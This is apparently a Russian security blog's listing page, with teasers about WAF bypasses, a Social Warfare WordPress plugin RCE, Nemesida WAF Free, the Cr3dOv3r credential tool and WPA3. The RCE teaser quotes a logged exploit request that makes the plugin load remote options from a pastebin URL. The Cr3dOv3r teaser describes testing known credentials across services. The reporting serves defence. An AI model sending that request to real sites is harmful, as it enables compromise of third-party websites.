Методы обхода WAF
, ,

Информация предназначена исключительно для ознакомления. Не нарушайте законодательство.

Web Application Firewall — популярный инструмент для противодействия атакам на веб-приложения. В этой статье я продемонстрирую несколько способов обхода WAF.

Читать далее Методы обхода WAF

Как мы обнаружили RCE, пытаясь воспроизвести XSS-уязвимость в Social Warfare
, , ,

Статья носит информационный характер. Не нарушайте законодательство.

Некоторое время назад WAF зафиксировал атаку, которая имела следующий вид:
https://defcon.ru/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf

Из открытых источников мы узнали, что атака представляла собой попытку эксплуатации хранимой XSS уязвимости в Social Warfare — популярном WordpPress-плагине, установленном более чем на 70000 сайтов. Это показалось интересным и мы решили разобраться в уязвимости более детально.

Читать далее Как мы обнаружили RCE, пытаясь воспроизвести XSS-уязвимость в Social Warfare

Nemesida WAF Free
, ,

Nemesida WAF Free — бесплатная версия «Nemesida WAF», обеспечивающая базовую защиту веб-приложения сигнатурным анализом, простая в установке и обслуживании, не имеющая высоких требований к аппаратным ресурсам.

Отличительной особенностью «Nemesida WAF Free» является простота установки и обслуживании, а также собственные сигнатуры, способные более точно выявлять атаки на веб-приложения при минимальном количестве ложных срабатываний.

Бесплатная версия «Nemesida WAF» представляет собой динамический модуль для ПО «nginx», обеспечивающий базовый функционал защиты веб-приложения от атак на основе сигнатурного метода. Подробнее

Cr3dOv3r — проверяем учётные данные на популярных сервисах
, , ,

В данной статье будет рассмотрена утилита Cr3dOv3r, разработанная D4Vinchi и выложенная им на GitHub. При создании этого инструмента, D4Vinchi преследовал две основные идеи. Первая — это возможность проверить является ли ваша учетная запись скомпрометированной. Второй идеей данной утилиты является возможность проверить, подходят ли известные вам учетные данные к популярным сервисам.

Читать далее Cr3dOv3r — проверяем учётные данные на популярных сервисах

Анонсирован новый стандарт защиты беспроводных сетей: WPA3

Wi-Fi Alliance анонсировал сведения о внедрении протокола WPA3. По прогнозам первый официальный релиз будет доступен уже в этом году.
Читать далее Анонсирован новый стандарт защиты беспроводных сетей: WPA3